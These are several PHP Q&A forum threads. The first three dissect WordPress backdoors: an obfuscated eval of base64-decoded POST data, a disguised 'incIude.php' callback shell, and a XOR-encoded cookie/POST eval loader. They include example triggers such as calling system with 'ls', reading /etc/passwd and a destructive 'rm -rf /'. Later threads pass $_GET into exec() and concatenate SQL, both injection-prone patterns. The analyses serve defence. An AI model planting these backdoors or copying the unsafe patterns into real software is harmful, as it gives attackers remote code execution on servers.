Unusual Code in almost each WordPress PHP File - php

Can any one explain this code. I am having this code on the top of almost every php file. What is this code for. Thanks for your help.
Here is the code....
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n642afe'])) {eval($s21(${$s20}['n642afe']));} ?>

I've seen that code a number of times in different incarnations. It's a piece of injected code left by an attacker. If you break it down it almost always results in eval($var); where $var is an injected parameter (usually $_POST) that then is used to perform some sort of malicious act on your server. Bear in mind eval() will execute any linux command with the same permissions and authority of the user running Apache/PHP.
Breaking down your example
In your example you've given the following code:
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n642afe'])) {eval($s21(${$s20}['n642afe']));} ?>
This is semi-obfuscated code but let's start to work through it. The first thing we need to do here is format it to start to understand it:
if (isset(${$s20}['n642afe'])) {
We can see now that this is a relatively simple PHP script.
Line 1:
$sF="PCT4BA6ODSE_"; is just a variable with what seems like random rubbish in it.
Line 2:
This can be translated into: $s21 = "base64_decode"
Line 3:
As above, running strtoupper() on that string produces the result _POST.
Line 4:
The if statement here checks to see if ${s20}['n642afe'] is set. Well we know that $s20 evaluates to _POST and ${} type variables take the value as their variable name so this is really:
Note: The n642afe part is a random parameter they've chosen so that you (or any other attacker!!!) tries to go to somefile.php?hack=yes it wouldn't work
Line 5:
The most dangerous part is here. Let's evaluate our variables in the same manner as above:
The end result
If I were to send rm -rf / base64 encoded as post value for the parameter n642afe that would recursively delete everything. Unlikely it'd be able to do that without super user permissions but the point is - they'd have the same access rights as you do when you SSH to your server. Here's an example of what that'd look like:
Translated, this becomes:
And then again:
eval('rm -rf /');
My recommendation is - take the site offline immediately, update it, patch any
holes that are obvious and then make sure your server (and any other sites on there) are secure. Pay particular attention to file and folder permissions on your server. Note: this is a non-exhaustive list, there's so much more you can do to protect yourself.
If you simply delete this line you'll probably find one of two things will happen (or both):
The permissions on the "infected" file are different and the file is owned by a different user. You'll need to chmod/chown the file to get it back
The attackers will keep trying to get back in once they've been successful once. Simply removing the bad code is a good start but ask yourself this: "How did they get in in the first place?". With that in mind, please refer to my recommendation paragraph to begin to solve your issue.
Finding how they got in
To find where attackers 'got in' could be a game of cat and mouse, it's worth starting with the apache access logs though and searching for requests to your infected file with the parameter n642afe. You could also check your PHP logs to see what exactly was run and see what other holes they've opened.


incIude.php, spelled with a capital "i" in the "l" position

I received a message from Siteground today with the subject "Vulnerable software detected on your account". (I love me some Siteground; no problem with their detection.)
When I investigate the files they found, there is a PHP file that exists in a few of my add on domains. It is incIude.php with a capital "i" in the "l" position. Even on this site, it looks the same as when properly spelled, because of the font. Obviously fishy. But curiously, the file is dated back in 2013. Any search I attempt comes back with links to typo-corrected files. It's the typo that is critical.
Anyway, here is the code in that file:
<?php #array_diff_ukey(#array((string)$_REQUEST['password']=>1),#array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>
Obviously, I'm at work cleaning this up. I'm just curious as to whether any of your subscribers can tell me more about this particular exploit.
It seems this is a simple backdoor script for RCE (Remote Code Execution). Re-formatting the script:
(string)$_REQUEST['password'] => 1
(string)stripslashes($_REQUEST['re_password']) => 2
Everything is prefixed with # to make sure no errors, exceptions, or warnings are issued. This would give away the backdoor script.
The important vulnerability here is that the last argument of array_diff_ukey is a callback function. Per usual in PHP this can be an anonymous function, function variable, or a string.
So the attack is:
include the script somewhere, somehow (innocent git commit? small change by an insider? temporary write access to the codebase?); in particular a login / registration endpoint that would include login and register in the form fields, but anywhere works (since the request can still include login and register parameters)
send a request like ?login=system&password=ls
the function specified as login gets called with keys from either array, i.e. from password and re_password; in the example the function would be system("ls", NULL)
profit! (RCE)
The stealthiness comes from:
an innocent looking filename, normally indistinguishable from "include"
no errors thrown
executed on login attempts which might be part of regular requests and not logged properly
It calls an arbitrary function named with the login query parameter that accepts up to two parameters, with the first parameter being the value of the password field, and the second parameter being the value of the re_password field. For instance:
will print the contents of /etc/passwd.

What does this (virus?) code do?

I found some code that I did not write in my public_html folder on my WordPress site. After a bit of effort, I was able to get it into a somewhat readable state, but it's still beyond me what it does. Could anyone with a better understanding tell me what this code was supposed to be doing?
If it helps, it had also overwritten my index.php file with this code, as well as had several references to a strange .ico file.
foreach (array_merge($_COOKIE, $_POST) as $key => $value) {
function fun1($key, $valueLength)
$keyGuid = $key . "49d339b2-3813-478a-bfa1-1d75be92cf49";
$repeatTimes = ($valueLength / strlen($key)) + 1;
return substr(str_repeat($keyGuid, $repeatTimes), 0, $valueLength);
function packToHex($inputToPack)
return #pack("H*", $inputToPack);
function fun3($exploded)
$modCount = count($exploded) % 3;
if (!$modCount) {
$value = packToHex($value);
$bitwiseXor = $value ^ fun1($key, strlen($value));
$exploded = explode("#", $bitwiseXor);
Short answer: It is backdoor, it allows to execute arbitrary code on the server side.
Note: all you need to see is that it has eval and takes input from the user.
What arbitrary code? Whatever they want.
Long answer:
It will take data from $_COOKIE and $_POST as you can see. This data comes from the user. We can infer that this code was designed for a malicius user recieve data (which, either the malicius user will send directly, or via a bot).
What does it dose with this data? Well, it will over all the input, one by one, and try to:
$value = packToHex($value); Interpret it as an hexadecimal string and covert it to its binary representation. Silently fail if it isn't an hexadecimal string.
$bitwiseXor = $value ^ fun1($key, strlen($value)); apply a cheap cipher over it. This is a symetric substitution cipher, it depends on $key and the hard coded guid 49d339b2-3813-478a-bfa1-1d75be92cf49. We can asume that who injected this code knows the guid and how to cipher for it (it is exactly the same code).
$exploded = explode("#", $bitwiseXor); We then separate the result by the character "#".
And fun3($exploded); interpret it as code (see [eval][1]).
If all succedes (meaning that the input from the user was such that it triggered this process), then it will exit, so that it flow of execution never reaches your code.
Now, somebody injected this code on the server. How did they do it? I do not know.
My first guess is that you have some vulnerability that allows them to upload PHP code (perhaps you have a file upload function that will happilly take PHP files and put them in a path where the user can cause the server to run them).
Of course, there are other posibilities... they may have brute forced the login to your ftp or admin login, or some other thing that would allow them to inject the code. Or you may be running some vulnerable software (an outdated or poorly configured WordPress or plugin, for example). Perhaps you downloaded and used some library or plugin that does watherver but is compromised with malware (there have been cases). or perhaps you are using the same key as your email everywhere, and it got leaked from some other vulnerable site... or, this was done by somebody who works with you and have legitimate access, or something else entirely...
What I am saying is that... sure remove that code from your server, but know that your server is vulnerable by other means, otherwise it wouldn't have got compromised in the first place. I would assume that whoever did this is out there, and may eventually notice you took it down and compromise your server again (Addendum: In fact, there could be some other code in your server that puts it back again if it is not there).
So go cover all your bases. Change your passwords (and use strong ones). Use https. Configure your server properly. Keep your software up to date.
If you have custom PHP code: Validate all input (including file uploads). Sanitize whatever you will send back to the user. Use prepared sentences. Avoid suspicius third party code, do not copy and paste without understanding (I know you can do a lot without really understanding how it works, but when it fails is when you really need the knowledge).
If you can, automate updates and backups.
Yes, there are security plugins for WordPress, and those can go a long way in improving its security. However, you can always configure them wrong.

file_exists() expects parameter 1 to be a valid path, string given

I'm designing a web application that can be customized based on which retail location the end user is coming from. For example, if a user is coming from a store called Farmer's Market, there may be customized content or extra links available to that user, specific to that particular store. file_exists() is used to determine if there are any customized portions of the page that need to be imported.
Up until now, we've been using a relatively insecure method, in which the item ID# and the store are simply passed in as GET parameters, and the system knows to apply them to each of the links within the page. However, we're switching to a reversible hash method, in which the store and item number are encrypted (to look something like "gd651hd8h41dg0h81"), and the pages simply decode them and assign the store and ID variables.
Since then, however, we've been running into an error that Googling extensively hasn't found me an answer for. There are several similar blocks of code, but they all look something like this:
$buttons_first = "../stores/" . $store . "/buttons_first.php";
(The /stores/ directory is actually in the directory above the working one, hence the ../)
Fairly straightforward. But despite working fine when a regular ID and store is passed in, using the encrypted ID throws this error for each one of those similar statements:
Warning: file_exists() expects parameter 1 to be a valid path, string given in [url removed] on line 11
I've had the script spit back the full URL, and it appears to be assigning $store correctly. I'm running PHP 5.4.11 on 1&1 hosting (because I know they have some abnormalities in the way their servers work), if that helps any.
I got the same error before but I don't know if this solution of mine works on your problem you need to remove the "\0" try replace it:
$cleaned = strval(str_replace("\0", "", $buttons_first));
it worked on my case.
Run a var_dump(strpos($buttons_first,"\0")), this warning could come up when a path has a null byte, for security reasons. If that doesn't work, check the length of the string and make sure it is what you'd expect, just in case there are other invisible bytes.
It may be a problem with the path as it depends where you are running the script from. It's safer to use absolute paths. To get the path to the directory in which the current script is executing, you can use dirname(__FILE__).
Add / before stores/, you are better off using absolute paths.
I know this post was created on 2013 but didn't saw the common solution.
This error occurs after adding multiple to the file submit form
for example you are using files like this on php: $_FILES['file']['tmp_name']
But after the adding multiple option to the form. Your input name became file => file[]
so even if you post just one file, $_FILES['file']['tmp_name'] should be change to $_FILES['file']['tmp_name'][0]

Why is javascript not able to use a javascript variable I declared in a php file?

Hey everybody, this issue has had me stumped for the last week or so, here's the situation:
I've got a site hosted using GoDaddy hosting. The three files used in this issue are index.html , milktruck.js , and xml_http_request.php all hosted in the same directory.
The index.html file makes reference to the milktruck.js file with the following code:
<script type="text/javascript" src="milktruck.js"></script>
The milktruck.js file automatically fires when the site is opened. The xml_http_request.php has not fired at this point.
On line 79 out of 2000 I'm passing the variable "simple" to a function within the milktruck.js file with:
placem('p2','pp2', simple, window['lla0_2'],window['lla1_2'],window['lla2_2']);
"simple" was never initialized within the milktruck.js file. Instead I've included the following line of code in the xml_http_request.php file:
echo "<script> var simple = 'string o text'; </script>";
At this point I have not made any reference whatsoever to the xml_http_request.php file within the milktruck.js file. I don't reference that file until line 661 of the milktruck.js file with the following line of code:
xmlhttp.open('GET',"xml_http_request.php?pid="+pid+"&unLoader=true", false);
Everything compiles (I'm assuming because my game runs) , however the placem function doesn't run properly because the string 'string o text' never shows up.
If I was to comment out the line of code within the php file initializing "simple" and include the following line of code just before I call the function placem, everything works fine and the text shows up:
var simple = 'string o text';
Where do you think the problem is here? Do I need to call the php file before I try using the "simple" variable in the javascript file? How would I do that? Or is there something wrong with my code?
So, we meet again!
Buried in the question comments is the link to the actual Javascript file. It's 2,200 lines, 73kb, and poorly formatted. It's also derived from a demo for the Google Earth API.
As noted in both the comments here and in previous questions, you may be suffering from a fundamental misunderstanding about how PHP works, and how PHP interacts with Javascript.
Let's take a look at lines 62-67 of milktruck.js:
//experiment with php and javascript interaction
//'<?php $simpleString = "i hope this works"; ?>'
//var simple = "<?php echo $simpleString; ?>";
The reason this never worked is because files with the .js extension are not processed by PHP without doing some bizarre configuration changes on your server. Being on shared hosting, you won't be able to do that. Instead, you can rename the file with the .php extension. This will allow PHP to process the file, and allow the commands you entered to actually work.
You will need to make one more change to the file. At the very top, the very very top, before anything else, you will need the following line:
<?php header('Content-Type: text/javascript'); ?>
This command will tell the browser that the file being returned is Javascript. This is needed because PHP normally outputs HTML, not Javascript. Some browsers will not recognize the script if it isn't identified as Javascript.
Now that we've got that out of the way...
Instead I've included the following line of code in the xml_http_request.php file: <a script tag>
This is very unlikely to work. If it does work, it's probably by accident. We're not dealing with a normal ajax library here. We're dealing with some wacky thing created by the Google Earth folks a very, very long time ago.
Except for one or two in that entire monolithic chunk of code, there are no ajax requests that actually process the result. This means that it's unlikely that the script tag could be processed. Further, the one or two that do process the result actually treat it as XML and return a document. It's very unlikely that the script tag is processed there either.
This is going to explain why the variable never shows up reliably in Javascript.
If you need to return executable code from your ajax calls, and do so reliably, you'll want to adopt a mature, well-tested Javascript library like jQuery. Don't worry, you can mix and match the existing code and jQuery if you really wanted to. There's an API call just to load additional scripts. If you just wanted to return data, that's what JSON is for. You can have PHP code emit JSON and have jQuery fetch it. That's a heck of a lot faster, easier, and more convenient than your current unfortunate mess.
Oh, and get Firebug or use Chrome / Safari's dev tools, they will save you a great deal of Javascript pain.
I'm going to be very frank here. This is bad code. This is horrible code. It's poorly formatted, the commenting is a joke, and there are roughly one point seven billion global variables. The code scares me. It scares me deeply. I would be hesitant to touch it with a ten foot pole.
I would not wish maintenance of this code on my worst enemy, and here you are, trying to do something odd with it.
I heartily encourage you to hone your skills on a codebase that is less archaic and obtuse than this one before returning to this project. Save your sanity, get out while you still can!
perhaps init your values like this:
window.simple = 'blah blah blah'
then pass window.simple
You could try the debugger to see what is going on, eg. FireBug

passing URL variables to exec() with php

I have a dedicated server that I use to crunch lots of data. The way I have it now, I can open a script with a process ID like example.php?ex_pid=123 and just let it go. It downloads a small portion of data, processes it, then uploads it into a database then starts again.
Ideally, I would like to call example.php?ex_pid=123 directly and not by passing a variable to example.php like exec('./example.php'.' '.EscapeShellArg($variable)); to keep it from acting globally.
I don't care about the output, if it could execute in the background, that would be brilliant. The server is an Ubuntu distribution btw.
Is this even possible? If so, any help and examples would be more then appreciated.
You could do something like:
exec("./example.php '".addslashes(serialize($_GET))."');
And then in example.php do something like this:
count($_GET) == 0 && $_GET = unserialize(stripslashes($_SERVER['argv'][1]))
The main issue with that is that ?ex_pid is GET data which is generally associated with either including the file or accessing it through a browser. If you were including the file or accessing it from a web browser this would be trivial, but running it as CLI, your only option would be to pass it as an argument, unfortunately. You can pass it as ex_pid=123 and just parse that data, but it would still need to be passed as an argument but doing that you could use parse_str() to parse it.
Depending on what the script does, you could call lynx to call the actual page with the get data attached and generate a hash for an apikey required to make it run. Not sure if that is an option, but it is another way to do it how you want.
Hope that helps!
I had a real problem with this and couldn't get it to work running something like example.php?variable=1.
I could however get an individual file to run using the exec command, without the ?variable=1 at the end.
What I decided to do was dynamically change the contents of a template file , depending on the variables I wanted to send. This file is called template.php and contains all the code you would normally run as a $_GET. Instead of using $_GET, set the value of the variable right at the top. This line of code is then searched and replaced with any value you choose.
I then saved this new file and ran that instead.
In the following example I needed to change an SQL query - the template file has the line $sql="ENTER SQL CODE HERE";. I also needed to change the value of a a variable at the top.
The line in template.php is $myvar=999999; The code below changes these line in template.php to the new values.
//Get the base file to modify - template.php
$sql="SELECT * FROM mytable WHERE foo='".$bar."'";
$contents=str_replace("ENTER SQL CODE HERE",$sql,$contents);
//Another search
//If the file doesnt't exist, create it
file_put_contents($filename, $contents);
//Now run this file
$cmd="/usr/local/bin/php ".$filename." >/dev/null &";
I had completely forgotten about this question until #Andrew Waugh commented on it (and I got an email reminder).
Anyways, this question stemmed from a misunderstanding as to how the $argv array is communicated to the script when using CLI. You can pretty much use as many arguments as you need. The way I accomplish this now is like:
if (isset($argv)) {
switch ($argv[1]) {
case "a_distinguishing_name_goes_here":
$pid = $argv[2];
case "another_name_goes_here":
